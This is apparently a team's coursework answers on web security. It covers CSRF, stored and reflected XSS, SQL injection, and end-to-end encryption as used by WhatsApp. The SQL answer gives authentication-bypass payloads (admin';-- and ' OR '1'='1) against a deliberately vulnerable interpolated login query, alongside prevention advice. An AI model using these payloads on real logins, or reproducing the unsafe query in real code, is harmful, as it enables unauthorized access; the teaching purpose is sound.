- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? and what is the attacker’s intention from it?
- Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
- What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
Team members : Mohamad Karbejha - Jafar bino - Reem Bino
1- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
CSRF is a web security attack where a user is tricked into unknowingly performing actions on a trusted website. Attackers exploit the automatic inclusion of session cookies in HTTP requests, using the victim's authenticated credentials. It's called the "one-click attack" because a single click can trigger the unauthorized action.
2- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
An XSS attack, or Cross-Site Scripting attack, is a type of security vulnerability typically found in web applications. It allows attackers to inject malicious scripts into content from otherwise trusted websites. This malicious content is then delivered to a user's browser, where it can execute with the privileges of the trusted context, potentially stealing data or performing actions on behalf of the user without their consent.
The connection between XSS attacks and cookies/sessions is significant because one of the primary goals of an XSS attack is often to steal session cookies. If an attacker can obtain a user’s session cookie via an XSS attack, they can potentially hijack the user's current session, gaining unauthorized access to their account on the application.
There are two main categories of XSS:
Stored XSS (Persistent XSS): This occurs when the malicious script is permanently stored on the target server, such as in a database, message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when they request the stored information.
Reflected XSS (Non-Persistent XSS): This happens when the malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an email message, or a malicious website link.
3- What is SQL injection? and what is the attacker’s intention from it?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. It allows an attacker to interfere with the queries that an application makes to its database.
The attacker's intentions from an SQL injection can vary, but typically include:
Data Theft: Extracting sensitive data from the database, such as personal information, financial details, or proprietary data.
Data Loss or Corruption: Deleting records or entire tables, or changing data without authorization, which could corrupt the data or make the application unreliable or unusable.
Bypassing Authentication: Modifying the logic of SQL queries to bypass security checks, allowing for unauthorized access to the system.
Privilege Escalation: Gaining elevated access to restricted areas of the application or executing commands with higher privileges than that of the current user.
Attacking Other Systems: Using the compromised database server to mount attacks on other systems within the network.
Database Server Compromise: In some cases, SQL injection can lead to the attacker gaining administrative rights on the database server, allowing them to execute commands on the host operating system.
4-Consider the below SQL command, where is the vulnerability? think about some ways an attacker can misuse it:
The vulnerability in the provided SQL command is that it directly uses input from the user (username and password) in constructing a SQL query without any form of input validation, sanitization, or prepared statements/parameterized queries. This practice makes the code susceptible to SQL injection attacks.
Here's how an attacker might misuse this:
Injecting Malicious SQL Code: An attacker could enter a username or password that includes SQL code. For example, a username input like admin';-- could lead to SQL code that comments out the rest of the SQL command and grants access without a valid password.
Bypassing Authentication: By crafting input that alters the SQL logic, an attacker may bypass authentication. If they know a username, they could use an input like ' OR '1'='1 which would always evaluate to true, potentially giving them access to that user's account.
Exfiltrating Data: More complex injections could be used to change the nature of the query to return sensitive data from the database.
Database Schema Discovery: An attacker could use injections to discover the structure of the database, information about tables, columns, and other database schema information, which could be used for further attacks.
Database Administration Commands: If the database permissions are not correctly set, an attacker might execute administrative commands against the database, leading to data loss or corruption.
To prevent SQL injection attacks, developers should:
Always use parameterized queries or prepared statements instead of string concatenation to create SQL queries.
Apply input validation and whitelisting to ensure only permitted characters are processed.
Employ ORM (Object Relational Mapping) tools that abstract SQL code and use parameterized queries by design.
Minimize the privileges of the database account that the application uses to connect to the SQL server.
Utilize web application firewalls and security tools that can detect and block SQL injection attempts.
5-What does End-to-End encryption means? Share an example of an well-known app using E2EE, how is that app using it?
End-to-End encryption (E2EE) is a security measure that ensures that messages or data being transmitted can only be accessed and read by the sender and the intended recipient. In other words, no one in between, including the service provider, can access or decipher the content of the message.
A well-known app that uses E2EE is WhatsApp. When you send a message on WhatsApp, it gets encrypted on your device using a unique encryption key. The encrypted message is then sent to the recipient's device, where it can only be decrypted and read using the recipient's encryption key. This means that even WhatsApp itself cannot read the message while it's in transit.
Example: Let's say you are having a conversation with a friend on WhatsApp. When you send a message, the content of that message is converted into a complex code that is meaningless to anyone who intercepts it. This encrypted message is securely transmitted to WhatsApp's servers. When your friend receives the message, it is decrypted using their encryption key and they can read the original content.
By using E2EE, WhatsApp ensures that your messages are protected and private. The only people who can access and read your messages are you and your intended recipients.